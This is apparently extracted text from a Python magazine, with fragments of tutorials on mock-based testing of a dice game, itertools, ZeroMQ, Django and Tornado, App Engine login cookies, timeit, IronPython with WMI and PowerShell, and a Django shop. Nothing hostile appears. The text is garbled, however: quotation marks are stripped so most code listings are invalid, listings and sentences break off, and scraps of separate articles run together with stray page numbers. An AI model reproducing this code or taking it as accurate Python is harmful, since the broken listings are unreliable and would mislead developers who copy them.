@mock.patch(builtins.print, mock.Mock())
def test_something(self):
The first option requires an additional parameter to the decorated test method while the second option requires
no change to the test method signature. Since we arent particularly interested in testing the print function right
now, well use the second option (Listing 44).
Listing 44. Suppressing print output
@mock.patch(builtins.print, mock.Mock())
def test_gameplay(self):
Users may play a game of Pig
INPUT.side_effect = [
# player names
George,
Bob,
,
# roll or hold
r, r,
r, r, r, h,
r, r, r, h,
# George
# Bob
# George
pig = game.Pig(*game.get_player_names())
pig.roll = mock.Mock(side_effect=[
6, 6, 1,
# George
6, 6, 6, 6,
# Bob
5, 4, 3, 2,
# George
])
self.assertRaises(StopIteration, pig.play)
self.assertEqual(
pig.get_score(),
{
George: 14,
Bob: 24
}
)
132
Isnt mock wonderful? It is very powerful, and were only scratching the surface of what it offers.
# roll or hold
r, r,
# George
pig = game.Pig(*game.get_player_names())
pig.roll = mock.Mock(side_effect=[2, 2])
pig.scores[George] = 97
pig.scores[Bob] = 96
pig.play()
self.assertEqual(
pig.get_score(),
{
George: 101,
Bob: 96
}
)
fake_print.assert_called_with(George won the game with 101 points!)
133
Hey, theres the StopIteration exception that we discussed a couple of times before. Weve only specified
two roll values, which should be enough to push Georges score over 100. The problem is that the game
continues, even when Georges score exceeds the maximum, and our mocked Pig.roll method runs out of
return values. We dont want to use the TestCase.assertRaises method here. We expect the game to end after
any players score reaches 100 points, which means the Pig.roll method should not be called anymore. Lets
try to satisfy the test (Listing 48).
Listing 48. First attempt to allow winning
def play(self):
Start a game of Pig
for player in cycle(self.players):
print(Now rolling: {}.format(player))
action = roll
turn_points = 0
while action == roll:
value = self.roll()
if value == 1:
print({} rolled a 1 and lost {} points.format(player, turn_points))
turn_points = 0
break
turn_points += value
print({} rolled a {} and now has {} points for this turn.format(
134
))
action = self.roll_or_hold()
self.scores[player] += turn_points
if self.scores[player] >= 100:
print({} won the game with {} points!.format(
player, self.scores[player]
))
return
After each players turn, we check to see if the players score is 100 or more. Seems like it should work,
right? Lets check (Listing 49).
Hmmm... We get the same StopIteration exception. What do you suppose that is? Were just checking to see
if a players total score reaches 100, right? Thats true, but were only doing it at the end of a players turn.
We need to check to see if they reach 100 points during their turn, not when they lose their turn points or
decide to hold. Lets try this again (Listing 50).
Weve moved the total score check into the while loop, after the check to see if the player rolled a one. How
does our test look now (Listing 51)?
Listing 49. Same error as before; players still cannot win
.......E
======================================================
ERROR: test_winning (test_game.GameTest)
A player wins when they earn 100 points
-----------------------------------------------------Traceback (most recent call last):
File /usr/lib/python3.3/unittest/mock.py, line 1087, in patched
return func(*args, **keywargs)
File ./test_game.py, line 130, in test_winning
pig.play()
File ./game.py, line 50, in play
value = self.roll()
File /usr/lib/python3.3/unittest/mock.py, line 846, in __call__
return _mock_self._mock_call(*args, **kwargs)
File /usr/lib/python3.3/unittest/mock.py, line 904, in _mock_call
result = next(effect)
StopIteration
-----------------------------------------------------Ran 8 tests in 0.011s
FAILED (errors=1)
135
# roll or hold
r, r, h,
# George
# Bob immediately rolls a 1
r, h,
# George
r, r, h
# Bob
136
The first object were mocking is the built-in print function. Again, this way of mocking objects is very
similar to mocking with class or method decorators. Since we will be invoking the game from the command
line, we wont be able to easily inspect the internal state of our Pig game instance for scores. As such, were
mocking print so that we can check screen output with our expectations.
Were also patching our Pig.roll method as before, only this time were using a new mock.patch.object function.
Notice that all of our uses of mock.patch this far have passed a simple string as the first parameter. This time
were passing an actual object as the first parameter and a string as the second parameter.
The mock.patch.object function allows us to mock members of another object. Again, since we wont have
direct access to the Pig instance, we cant monkey patch the Pig.roll the way we did previously. The outcome
of this method should be the same as the other method.
Being the lazy programmers that we are, weve chosen to use the itertools.cycle function again to continuously
return some value back for each roll of the die. Since we dont want to specify roll-or-hold values for an entire
game of Pig, we use TestCase.assertRaises to say we expect mock to raise a StopIteration exception when there
are no additional return values for the input mock.
I should mention that testing screen output as were doing here is not exactly the best idea. We might change
the strings, or we might later add more print calls. Either case would require that we modify our test itself,
and thats added overhead. Having to maintain production code is a chore by itself, and adding test case
maintenance to that is not exactly appealing.
That said, we will push forward with our test this way for now. We should run our test suite now, but be sure to
mock out the new main function in game.py first (Listing 53).
Listing 53. Expected failure
F........
======================================================
FAIL: test_command_line (test_game.GameTest)
The game can be invoked from the command line
-----------------------------------------------------Traceback (most recent call last):
137
We havent implemented our main function yet, so none of the mocked input values are consumed, and no
StopIteration exception is raised. Just as we expect for now. Lets write some code to launch the game from
the command line now (Listing 54). Hey, that code looks pretty familiar, doesnt it? Its pretty much the
same code weve used in previous gameplay test methods. Awesome!
Listing 54. Basic command line entry point
def main():
Launch a game of Pig
game = Pig(*get_player_names())
game.play()
if __name__ == __main__:
main()
Theres one small bit of magic code that weve added at the bottom. That if statement is the way that you
allow a Python script to be invoked from the command line. Lets run the test again to make sure the main
function does what we expect (Listing 55).
Beauty! At this point, you should be able to invoke your very own Pig game on the command line by running:
python game.py
Isnt that something? We waited to manually run the game until we had written and satisfied tests for all of
the basic requirements for a game of Pig. The first time we play it ourselves, the game just works!
138
What Now?
Now that we have a functional game of Pig, here are some tasks that you might consider implementing to
practice TDD.
accept player names via the command line (without the prompt),
bail out if only one player name is given,
allow the maximum point value to be specified on the command line,
allow players to see their total score when choosing to roll or hold,
track player scores in a database,
print the runner-up when there are three or more players,
turn the game into an IRC bot.
The topics covered in this article should have given you a good enough foundation to write tests for each one
of these additional tasks.
139
Listing 2. For example, a list and string are iterables but they are not iterators
>>> a = [1, 2, 3, 4, 5]
>>> a.__iter__
<method-wrapper __iter__ of list object at 0x02A16828>
>>> a.next()
Traceback (most recent call last):
File <pyshell#76>, line 1, in <module>
a.next()
AttributeError: list object has no attribute next
>>> iter(a)
<listiterator object at 0x02A26DD0>
>>> iter(a).next()
Some file are iterables that are also their own iterators, which is a common source of confusion. But that
arrangement actually makes sense: the iterator needs to know the details of how files are read and buffered,
so it might as well live in the file where it can access all that information without breaking the abstraction
(Listing 3).
140
Why the distinction? An iterable object is just something that might make sense to treat as a collection,
somehow, in an abstract way. An iterator lets you specify exactly what it means to iterate over a type,
without tying that types iterableness to any one specific iteration mode. Python has no interfaces, but this
concept separating interface (this object supports X) from implementation (doing X means Y and Z)
has been carried over from languages that do, and it turns out to be very useful.
Itertools Module
The itertools module defines number of fast and highly efficient functions for working with sequence like
datasets. The reason for functions in itertools module to be so efficient is because all the data is not stored
in the memory, it is produced only when it is needed, which reduces memory usage and thus reduces side
effects of working with huge datasets and increases performance.
chain(iter1, iter2, iter3.....)
the argument.
returns a single iterator which is the result of adding all the iterators passed in
takes two arguments an iterable and length of combination and returns all possible
n length combination of elements in that iterable.
combinations(iterable, n)
takes two iterables as arguments and returns an iterator with only those values in
data that corresponds to true in the selector.
compress(data, selector)
141
both start and stop arguments are optional, the default start argument is 0. It returns
consecutive integers if no step argument is provided and there is no upper bound so you will have provide a
condition to stop the iteration.
count(start, step)
returns an iterator that indefinitely cycles over the contents of the iterable argument it is
given. It can consume a lot of memory if the argument is a huge iterable.
cycle(iterable)
>>> p = 0
>>> for i in itertools.cycle([1, 2, 3]):
p += 1
if p > 20: break
print i,
12312312312312312312
returns an iterator after the condition becomes false for the very first time.
After the condition becomes false it will return the rest of the values in the iterator till it gets exhausted.
dropwhile(condition, iterator)
will return an iterator for those arguments in the iterable for which the condition
is true, this is different from dropwhile, which returns all the elements after the first condition is false, this
will test the condition for all the elements.
ifilter(condition, iterable)
will return an iterator with selected items from the input iterator by index.
Start and step argument will default to 0 if not given.
islice(iterable, start, stop, step)
142
will return an izip object whose next() will return a tuple with i-th element
from all the iterables given as argument. It will raise a StopIteration error when the smallest iterable is
exhausted.
izip(iter1, iter2, iter3....)
is similar to izip but will iterator till the longest iterable gets
exhausted and when the shorter iterables are exhausted then fallvalue is substituted in their place.
izip_longest(iter1, iter2,...., fillvalue=None)
will return the object for n number of times, if n is not given then it returns the object endlessly
returns an iterator whose elements are result of mapping the function to the elements
of the iterable. It is used instead of imap when the elements of the iterable are already grouped into tuples.
starmap(function, iterable)
this function is opposite of dropwhile, it will return an iterators whose values are
items from the input iterator until the condition is true. It will stop as soon as the first value becomes false.
takewhile(condition, iterable)
143
>>> s = 0
>>> p = 123ab
>>> for i in itertools.tee(p, 3):
print iterator %d: %s,
s += 1
for q in i:
print q,
print \n
iterator 0: 1 2 3 a b
iterator 1: 1 2 3 a b
iterator 2: 1 2 3 a b
Summary
So I believe by now you must have a clear understanding of Python iterators and iterables. The huge
advantage of iterators is that they have an almost constant memory footprint. The itertools module can be
very handy in hacking competitions because of their efficiency and speed.
144
ZeroMQ
Enter ZeroMQ.
On the surface, it would seem that ZeroMQ is a very fast (zero time) message queue, but I find that a bit
of a misnomer. Its not a message broker like RabbitMQ. It doesnt support the Advanced Message Queuing
Protocol (AMPQ). Theres no management interface. It doesnt persist messages to a disk, and if you dont
have a subscriber, all of the publishers messages are dropped by default. You cant inspect messages or get
statistics on the queue at least not without writing your own management layer.
ZeroMQ is more like a brilliant and fast socket library with built-in support for a wide variety of
asynchronous patterns. This makes ZeroMQ an ideal message dispatcher when you dont need complex
broker features. For my metrics library, I didnt need those features, but I did need speed.
Gauges: Finally, Zibrato can be used to insert an arbitrary value into the backend at any point in the code.
from zibrato import Zibrato
z = Zibrato()
# Zibrato gauge
z.gauge(level = crit, name = gauge_name, value=123)
This is just a quick overview of how Zibrato is used to instrument code. For more information, check out the
library at Pypi (https://pypi.python.org/pypi/Zibrato) or look at my Github.com repository (https://github.
com/version2beta/zibrato).
The architecture
In order to accomplish the goals behind the API, Zibrato is divided into three parts:
The Zibrato library, which implements the API described above and publishes metrics to the message queue.
As a user, I can have zero or more instrumented processes all communicating with my message queue.
A message broker, which subscribes to zero or more publishers of metrics and in turn republishes the
metrics to zero or more backend subscribers.
Zero or more backend providers, which subscribe to the message broker to receive metrics, then in turn
do whatever is appropriate with them. In my application, the backend provider sends the messages to my
Librato account.
146
Using ZeroMQ
Clearly, ZeroMQ is the special sauce in the Zibrato architecture, doing the heavy lifting of messages from
the instrumented code to the backend providers. It provides the asynchronicity.
If you dont already have ZeroMQ installed, its easy to do with pip:
pip install --upgrade python-dev pyzmq
If youre running Anaconda Python from Continuum Analytics, pyzmq is already installed.
147
Building a subscriber
A broker without any listeners has little purpose in life. Lets create a simple subscriber that receives
messages and prints them to standard output. Well create this in a separate Python script it runs
separately from the broker. Heres how to create a subscriber:
First, we connect to our ZeroMQ context described above.
Then we create our listeners socket.
Next, we set a filter to which our socket subscribes. Our call to receive messages from the message broker
will only return values that start with this filter. An empty string subscribes to all messages, but the default is
to subscribe to no messages so we have to set it to something, even if its an empty string.
Finally, we set up a loop to keep on listening until something comes in.
Our code might look like this:
import zmq
# Get the ZeroMQ context
context = zmq.Context()
# Create a socket
socket = context.socket(zmq.SUB)
socket.connect(tcp://127.0.0.1:5551)
# Subscribe to all messages
socket.setsockopt(zmq.SUBSCRIBE, )
# Keep on keeping on
while True:
print socket.recv()
This code gives us a listener that will receive anything the broker forwards and print it to STDOUT. Now all
we need is someone who will give the broker some messages to forward.
Building a publisher
If a tree falls in the forest and theres no one to hear it, does it make any noise? I dont know the answer to
that question, but I do know that a message broker without any publishers lives a pretty quiet life.
Connecting our broker to a publisher is easy to do. In a third Python script, well create a publisher that
sends messages to the broker. If we do it right, the subscriber we created in the last section will receive these
messages and print them to STDOUT.
Heres how to build a publisher:
First, we connect to our ZeroMQ context, just like we did above.
Next, we create our publisher socket.
Finally, we send a message from our publisher to the message broker.
148
With these three components, we have a publisher that sends messages, a subscriber that receives messages,
and a broker that forwards messages from any connected publisher to any connected subscriber.
Credits
Isaac Newton once said If I have seen further it is by standing on the shoulders of giants. At best I squat
and risk falling off the giants shoulders, so I prefer the earlier quote from Isaiah di Trani, who said Who
sees further a dwarf or a giant? Surely a giant for his eyes are situated at a higher level than those of the
dwarf. But if the dwarf is placed on the shoulders of the giant who sees further?... So too we are dwarfs
astride the shoulders of giants. We master their wisdom and move beyond it.
ZeroMQ is the brilliant work of Pieter Hintjens and iMatix Corporation. It is a powerful and flexible
messaging platform and I highly recommend it for asynchronous applications. I also recommend reading
Pieters ZeroMQ Guide. Its lengthy and comprehensive, but its quite accessible and even an enjoyable read.
http://zeromq.org/
http://zguide.zeromq.org/
I first became aware of Librato on the Ruby Rogues podcast #62 featuring Joe Ruscio, Libratos CTO and
cofounder. Theyve done an excellent job of making metrics easy. Librato offers free development accounts
and a free month of production with very reasonable pricing thereafter.
https://metrics.librato.com/
http://rubyrogues.com/062-rr-monitoring-with-joseph-ruscio/
Zibrato was initially inspired by Etsys Statsd package, a Node.js service that, coupled with Graphite (written
in Python and Django), provides a full asynchronous instrumentation stack. On a related note, check out Steve
Ivy. He has not only written a Python library for interfacing with Statsd, hes also reimplemented it in Python.
149
150
Django Features
Django is a one-size fits-all system. The most fundamental piece of the web is an HTTP request. Django
controllers allow regular expression matching on urls, to call the right functions and field incoming requests.
Much like any web framework, you get sensible default requests and responses, with the ability to override.
You can determine GET or POST along with other web context, so you can separate your code cleanly.
If youre like most people or companies, you will want to collect data from your users and store it in a database.
This is one place where Django can really help out with its robust defaults. It has a form generator that will
allow you to define the form in terms of your database fields, then generate the html for you, and validate
the users data on a POST submission. The sophisticated data model reads your existing database schema, or
creates one for you, and generates code to define the schema as software objects. You can then read and set
attributes, query based on filters and otherwise think of your sql data in terms of objects in a class hierarchy.
The Achilles heel of the system, however, is that its hard to stylize if you have a specific set of graphic design
goals. The template system provides the View part of MVC. You can assign variables to an html template
which lives outside of the python code, then the templates values will be replaced. This is fairly standard
practice these days, and Django does a great job of it. You can loop over iterable objects such as lists and
dictionaries, and call functions. The template inheritance is a simple yet powerful way of defining standard
headers and footers, as well as other features, so they exist on every page. The templating is not the fastest on
the web, however, so you should plan for additional processing time. Since it is such a mature system, Django
has all kinds of other features as well: user authentication, localization, unicode handling, and the list goes on.
If you want a framework that will cover everything you can possibly need, and you just dont have the time or
skill to do a lot of work to get it done, then Django is a great system for you. As they describe it, Django is the
web framework for perfectionists with deadlines.
Tornado Features
Tornado is perhaps the leanest and meanest of the fully featured Python frameworks. Its small and fast, while
handling the basic expectations of an MVC framework. Smaller also means simpler, so you get easy access
151
Django Example
Django has an excellent tutorial that will help you understand the depth and breadth of its features, and can be found
at https://docs.djangoproject.com/en/dev/intro/tutorial01/. This will walk you through what it takes to bring up a
Minimum Viable Server... for brevity, Im going to cut through a lot of that and create a Minimum Functioning
Program. Lets create a set of web pages that allow someone to send you an email message through the web, and
store the message in the database without all the extras that you would want to operate a web-based business. Once
you have Django installed, from the shell you run its admin system:
%> django-admin.py startproject django_sdj
%> cd django_sdj
%> python manage.py runserver
Go to http://localhost:8000 in your browser, you should get a standard hello page. When you have that
going, move onto the next steps. For simplicity, lets use a sqlite database and let Django provision it for us.
Edit settings.py to look like this:
ENGINE: django.db.backends.sqlite3, # Add postgresql_psycopg2, mysql, sqlite3 or
oracle.
NAME: django_sdj.sqlite3,
Then back in the shell, run django syncdb and run through the prompts:
%> python manage.py syncdb
152
Then edit settings.py and hello/models.py to begin adding some meat to your app. See the code diff I made here:
https://github.com/mdagosta/hello-sdj/commit/c897
0ded6fc015f57278ad128f5b9195eeaa2a4e. Check out what the Django model will generate:
%> python manage.py sql hello # sample output. if it looks ok..
%> python manage.py syncdb
The Django Admin interface is really convenient and worth settings up. Ill skip over the details, but to get it
working I did this: https://github.com/mdagosta/hello-sdj/commit/7e4744e7c92be1e3430a147b4965ae0b7172
dd03. Keep following along with the code, and add some urls and views: https://github.com/mdagosta/hello-sdj/
commit/a1882138363ff684c11b427a37a067a75166cff1. Hopefully youre getting into the flow of editing the files,
running the app and loading it in your browser. I did, and believe that a Git Commit is worth a thousand words, so
here are 3 commits that built all the features for the web-based database email system:
https://github.com/mdagosta/hello-sdj/commit/3e5b0c5a4fb4beb3e2e968ee1a0e9ecb35bc0fc7
https://github.com/mdagosta/hello-sdj/commit/866c88b3d51724f5e1a8177ce56d66565dc3e8bb
https://github.com/mdagosta/hello-sdj/commit/b97230fbc08ea85c8c8730609f32c3befc097314
I hope that you are successful and your application works great. If you get it working, youll send me an
email, and Ill respond to let you know that I got your message. Dont be shy :-)
Tornado example
For the Tornado example, I will walk you through installing tornado so you can get the webchat demos
that come with the tornado package. These examples are sufficient to illustrate the Polling and Websocket
implementations without any modifications needed. The first chat demo requires Google OAuth, so if you
arent already Google Borg youll need to sign up for Google if you want to try it out. Start by cloning tornado
from github:
%> git clone https://github.com/facebook/tornado.git
%> cd tornado
%> sudo python setup.py install
Then copy the contents of the tornado/demos/chat directory to yours and run it:
%> cp -R tornado/demos/chat .
%> cd chat
%> ./chatdemo.py # Ctrl-C to exit
Use two separate browsers or profiles and visit http://localhost:8888, and sign into Google. Out of the box
you should be able to type messages that appear in the other browser.
Try the same thing using websockets. Go back up a directory and copy the contents of the tornado/demos/
websocket directory to yours:
%> cp -R tornado/demos/websocket .
%> cd websocket
%> ./chatdemo.py # Ctrl-C to exit
You will see some differences under the hood, in the terminal where you ran the server. But otherwise
your messages should appear in both browser as with the original chat demo. These code samples are
153
How to Choose
To choose between Django and Tornado, you should consider what kind of site you are trying to build, your
teams skills levels and proximity to each other, and how much effort you can afford to put into it. Django
will generally be better for beginners, since it abstracts away a lot of details, and for projects on a budget or
deadline. Tornado will generally allow more experienced developers fulfill a larger vision, although it will
take more effort to build up some of the infrastructure.
If your team is distributed, Django will provide better tools for managing schemas and migrating
data, where Tornado doesnt have anything like that built in. However, if your team is located in close
proximity, you can cultivate a culture of making something great from something small. Lastly, if your
application requires something like polling or web sockets, or needs to make web requests in order to
complete your own users web requests, Tornados IOLoop will offer you a lot of value. There are risks
associated with async systems, such as blocking the main thread, but when mitigated, asynchronous
systems bring a wider variety of dynamic and interactive features that are hard to accomplish with
standard forking web servers. If you have a highly skilled team working in close proximity, you will
almost certainly be able to pull off any vision using Tornado.
Summary
If youre starting a new project from scratch, I highly recommend Python. Its a great overall language with
enough clarity, speed and features that you can bring together a global team to build a high-performance
website. Youll want to choose a web framework that suits your team and project, between Django and
Tornado you can accomplish almost anything.
154
Before we go ahead coding for the SignUp handler, we need some place to store our users registration
details. On GAE we will be using The Great Guidos ndb library for setting up our models (Listing 2).
Listing 1. Possible user registration form markup
<h1> New User? Register Here! </h1><hr>
<form method=POST action=/create_account>
<label> username: <input type=text name=username></label> |
<label> set a password: <input type=password name=password></label> |
<button type=submit > create my account</button>
</form>
155
156
We are using a similar approach to the one we used to protect our passwords. We store each cookie with a
hash of the cookie value salted with a variable salt and a static salt.
Logout functionality
Logout is simply clearing up the stored cookie (Listing 5).
Listing 5. Clearing up stored cookie
class LogoutHandler(webapp2.RequestHandler):
def get(self):
cookie_value =
cookie = username = + cookie_value + ;Path = /
self.response.headers.add_header(Set-Cookie, cookie)
template = jinja_environment.get_template(home.html)
variables = {message: Successfully logged out.}
self.response.out.write(template.render(variables))
157
And now were implementing our decorator login_required (Listing 7). As an example say we want to add a
new page which should be login protected. We can implement it like this: Listing 8.
158
Simple timing
The most intuitive way to measure code execution time in any programming language is the same
method that we would use with any real life action. We would take the time before an action has started,
then again after its finished, and subtract the difference to find the duration.
In Python, the current timestamp (in seconds) can be retrieved using time.time(). Heres a simple example
that times the creating of a commadelimited string containing all numbers from 1 to 100,000:
import time
start = time.time()
lst = [str(i) for i in range(100000)]
res = ,.join(lst)
end = time.time()
print Execution took %.3fs % (end start)
The last line of this script will output the time it took for the loop to be executed.
If you run this example multiple times, youll notice the results vary slightly. Why is that?
Every process that runs on your system depends on physical resources like CPU and memory which are
shared between all the running processes. Since you have other processes running, from your browser to
your operating system, the script might need to wait for one or more resources to become available and
might take a (tiny) bit longer.
Using timeit
The most straightforward approach for minimizing the deviation is to run the same script many times, and check
the average execution time. The more times the script is run, the more accurate the timing is. Fortunately enough,
Python has a built-in solution to help us out. A module called timeit which provides a simple way to time small
bits of Python code. Rewriting our previous example with timeit:
from timeit import timeit
times = 20
total = timeit(stmt=lst = [str(i) for i in range(100000)] res =
,.join(lst), number=times)
print Average execution took %.3fs % (total/times)
In the above example, we measure how much time it takes to execute our code, given as a string, using
timeit. The code will be executed number-times, which defaults to 1,000,000 (20 in our example).
159
160
161
Conclusion
By using Pythons timeit, timing code execution it is very simple. I think its a great tool that every Python
developer should use when trying to optimize performance and experiment with different approaches to the
same problem.
162
Installing IronPython
Just visit the IronPython-website and either download the zip-file or the installer (If you want to follow the
basic examples in a Linux or Mac OS X environment you can also run IronPython on Mono: simply put the
mono executable in front of any ipy.exe call).
To test your installation write the following hello-world script and save it as hello_iron_python.py: Listing 1.
Listing 1. Hello world in IronPython
print Hello IronPython.
You can run it by passing it as an argument to the ipy.exe executable that was part of the IronPython installation:
ipy.exe hello_iron_python.py
# mono ipy.exe hello_iron_python.py
[Out] Hello IronPython.
If this prints the string Hello IronPython. you are setup and ready to go.
Another nice use of the ipy interpreter is calling it without any arguments: this starts the Python-REPL a
very useful tool to explore and experiment with code. It can also be used to introspect .NET objects with the
Python method dir(<object>) that will return all properties and methods defined on the object.
163
Now that the basics are working it is time to use IronPython in conjunction with other parts of the .NET framework.
Apart from moving files, most automation tasks on windows require the use of either WMI or Powershell to
obtain required information or perform necessary actions (As long as you do not need to access information
about Windows-specific parts, it is actually possible to use IronPython as a replacement for CPython by
utilizing the standard library modules like os, sys and others. With a little attention this will keep your script
portable between IronPython and CPython.).
To demonstrate the interaction between IronPython and Powershell (the emerging standard for Windows
administration), the following example will obtain information about currently running processes and output the
acquired information to the console. The information is obtained by calling the Powershell Get-Process-cmdlet.
First we need to be able to access Powershell from IronPython: as Powershell runs on the .NET framework we
can use it after the following steps:
add a reference to System.Management.Automation,
import RunspaceInvoke,
Invoke()
runspace = RunspaceInvoke()
yield runspace
runspace.Dispose()
164
sorted according to
When running a cmdlet, it will return PSObjects. These objects are a wrapper around the actual objects that are
normally needed and are accessible via the BaseObject property.
Now on to obtaining a list of all running processes and ordering it by used memory per process (just add the
code to the same file, you put the Powershell snippet in): Listing 4.
As its easy to see IronPython even maps methods like getattr to the equivalent methods on the .NET
objects.
However, anyone who has worked with the Get-Process cmdlet has probably realized that the obtained
information are somewhat limited and some properties seem to be missing. A prominent example of one
such missing property is the CommandLine that started the process: this can be useful if you start multiple
scripts and only want to kill one script that you can identify by its commandline arguments.
165
To obtain information about the CommandLine it is necessary to use WMI. To query WMI (using Windows
Query Language (WQL) you have to reference the System.Management assembly and use either a
ManagementObject or a ManagementObjectSearcher to perform the queries:
the ManagementObject can only return one management object,
the ManagementObjectSearcher can return a collection of management objects that can be accessed by calling
Get() on the result of the query (Listing 6).
Listing 6. Using WMI via WQL
import clr
clr.AddReference(System.Management)
from System.Management import ManagementObjectSearcher
query = SELECT * FROM Win32_Process
query_result = ManagementObjectSearcher(query)
wmi_processes = query_result.Get()
enumerator = wmi_processes.GetEnumerator()
if enumerator.MoveNext():
process = enumerator.Current
for prop in process.Properties:
print %s %s % (prop.Name, prop.Value)
for process in wmi_processes:
if ipy in process[Name]:
if sleep in process[CommandLine]:
print Found evil process: will delete it!
process.Delete()
As soon as you know the property that you need (using the REPL to find it is a good idea) you can access it
via object[<property>], instead of iterating and printing all properties. This is shown at the end of the script
where we destroy the sleeping script as soon as we find it and not the ipy process that runs the terminationscript (just make sure that you started the sleep-script in another shell).
In conjunction with basic Python modules like os, sys and glob, this should be enough information to get
started scripting Windows while using IronPython.
166
System;
System.IO;
IronPython.Hosting;
Microsoft.Scripting;
Microsoft.Scripting.Hosting;
After compiling this class and running it in the same folder where you put the hello_iron_python.py script you
should see the same output as before (In my examples I use mono to compile and run these examples, as I
use a Linux machine at home it should be possible to execute these steps with the the same calls to the csc.
exe compiler of Microsoft).
mono-csc /reference:IronPython.dll /reference:Microsoft.Scripting.dll csharp_hosting.cs
mono csharp_hosting.exe
[Out] Hello IronPython.
167
return x + y
# Obtain the name variable from the scope
param = name
hello_there(name)
# Write something into the scope
out_param = Hi C#
System;
System.IO;
IronPython.Hosting;
Microsoft.Scripting;
Microsoft.Scripting.Hosting;
168
Compiling and running the new and improved engine will produce the following output: Listing 10.
Listing 10. Output of the new engine
Hello, Reader!
Read a parameter back: Hi C#
Sum of 3 and 4 (by Python): 7
This should provide a short introduction into using IronPython as an embedded scripting language.
For a complete list of these mapping pecularities and how they are handled, it is best to check the official
IronPython documentation.
Summary
This article showed you how to setup IronPython and take your first steps with the language on the .NET
framework. Moreover, it explained how to integrate some essential tools, like Powershell and WMI that you
might need when using it to script Windows.
Furthermore it explained how to use IronPython as a possibility to extend your application with scripting
abilities in a few lines of code.
If you want more information about IronPython, either look at the official documentation or reach for a book
about the topic IronPython in Action remains a very good reference, even though it was already relased in 2009.
169
On the Web
Glossary
CLR
The Common Language Runtime the environment all .NET languages run on.
CPython
Normally only called Python: the official reference implementation of the Python programming language.
DLR
CLR
IronPython
Language Runtime
(CLR).
Mono
An open source implementation of the .NET framework available for Linux, Mac OS X, Solaris and Windows.
REPL
The read-eval-print-loop a interactive shell often used by dynamic language to allow rapid exploration and prototyping.
WMI
Microsoft Windows implementation of the Web-Based Enterprise Management and Common Information standards.
WQL
Query language used to obtain information about the system from WMI.
170
171
Listing 8. Mail server for debugging (prints mails to stdout). Example for port 1025
>>>python -m smtpd -n -c DebuggingServer localhost:1025
These may be just few from the long list of techniques which Python provides to its programmers. But the
availability of these programming ideology makes Python so interesting and quick to code without giving up
on the readability of code.
172
Django is a high-level Python Web Framework that encourages rapid development and clean,
pragmatic design.
djangoproject.com
Based on the philosophy of DRY (Dont Repeat Yourself), Django is a little bit different than other MVC
frameworks, views are called templates and controllers are called views, that way Django is a MTV
framework, may not seem but it has a difference, but talk is cheap, show me the code!.
Suppose that a local market of your town, the D-buy, knew that youre a developer and hired you to develop
an e-commerce for some of their products. You, as a Python developer, took the job and started to develop
your solution.
If you dont have Django installed on your machine, you can install it via pip. For this tutorial were going to
use the 1.5.1 version.
$ pip install Django==1.5.1
As you can see, a folder, named dbuy was created on your directory. Get into it, and see the files created.
$ ls
dbuy
$ cd dbuy
$ tree
.
dbuy
__init__.py
settings.py
urls.py
wsgi.py
manage.py
1 directory, 5 files
manage.py
A file that lets you handle commands into your django project.
dbuy/settings.py
dbuy/urls.py
dbuy/wsgi.py
And, if you visit http://localhost:8000/ on your browser you should see a Welcome screen.
This is the Django development server, a Web server written in Python. Note that this server is not meant to
be used to run your applications in production, its just to speed your development.
Initial setup
Open dbuy/settings.py. Its a python file that represents Django settings. Youll see database, timezone,
admins, static and template configs. At first were going to set up the database. Youll see a dict like this:
Listing 1.
Listing 1. A longer piece of Python code
DATABASES = {
default: {
ENGINE: django.db.backends., # Add postgresql_psycopg2, mysql, sqlite3 or
oracle.
NAME: ,
# Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
USER: ,
PASSWORD: ,
HOST: , # Empty for localhost through domain sockets or 127.0.0.1 for localhost
through TCP.
PORT: ,
# Set to empty string for default.
}
}
You can set more than one database, but for this tutorial were just using one, the default one. The keys
represent the settings of a database.
ENGINE What database youll use. Django supports officially postgresql, mysql, oracle and sqlite3.
Were going to use sqlite3.
NAME Your database name. In our case, the name of the file.
174
Take a look at INSTALLED_APPS setting. A tuple that shows all Django applications that are activated in your
project. You can create your own pluggable apps, package and distribute them to other developers.
already comes with some apps, already included in Django. You can install other apps, made
by others or by yourself. Also, you can create your own pluggable apps, package, and distribute them to
other devs.
INSTALLED_APPS
With the database configured, lets create our database. At your shell, type:
$ python manage.py syncdb
This command will see all the INSTALLED_APPS and create all the necessary tables for your database.
Creating your apps
Youre developing an e-commerce, so what should you have? In your e-commerce youll just have a list of
products, that can be grouped by categories and can be bought by a customer. So lets start implementing the
products. In your shell, type the following command.
$ python manage.py startapp products
database.db
dbuy
__init__.py
settings.py
urls.py
wsgi.py
manage.py
products
__init__.py
models.py
tests.py
views.py
A Django app is a python package, with some files, that follows some conventions. You can create the folder
and the files by yourself but the startapp command eases your life. The next step is to write your models to
define your database. Our products will have name, photo, description, price and categories. The categories
175
In django, a model is represented by a class that inherits from django.db.models.Model. The class variables
represent the fields of the table created by the ORM. Each field is represented by an instance of a Field class.
By default all these fields are required, if you want to set an optional field you should explicitly say this, by
using the parameters blank and null.
Some fields, like DateTimeField, when blank (not required) must be null, so if you just set as blank and dont
submit the value of the field, it will raise IntegrityError, because blank is allowed but null is not. You should
avoid using null=True on string based fields because doing that you allow two possible fields for no data:
Null and the empty string.
Some fields have required arguments, e.g. max_length in CharField, the max_digits to the DecimalField and
upload_to in the ImageField. Well talk about it later.As you can see we used the parameter choices on
the categories. The choices parameter (optional) must receive an iterable object, of iterables of exactly 2
items (e.g. [(A,B), (C,D)])). The first one is the value that will be stored on the database, the second one is
meant for humans.
What you just wrote gives you a lot of information, with the ORM, this class describes your database
table and gives you access to it, but you need to activate it before. In dbuy/settings.py, add your app to the
INSTALLED_APPS tuple: Listing 4.
176
products,
# Uncomment the next line to enable the admin:
# django.contrib.admin,
# Uncomment the next line to enable admin documentation:
# django.contrib.admindocs,
Youll see that your product table was created, and now lets play a little bit with the database.
Were going to use python shell through the manage.py, that way the Django environment is autoloaded on
your shell.
$ python manage.py shell
>>> from products.models import Product
>>> Product.objects.all()
[]
# No product was created.
>>> p = Product(name=Pacman, description=some description, price=12.99, categories=games)
# just created your product
>>> p.save()
# Now it is on the database
>>> p.id
1
>>> Product.objects.all()
[<Product: Product object>]
But this representation isnt the best one. You can set on your models another way to represent your products
class Product(models.Model):
...
def __unicode__(self):
return self.name
Lets deal with these objects in a better way than the command line. Django already comes with an admin
interface that eases a lot your development. You just need to uncomment three lines and the admin is enabled! On
your dbuy/urls.py uncomment the following lines:
177
And in your dbuy/settings.py, uncomment django.contrib.admin, into your INSTALLED_APPS. Just run the syncdb
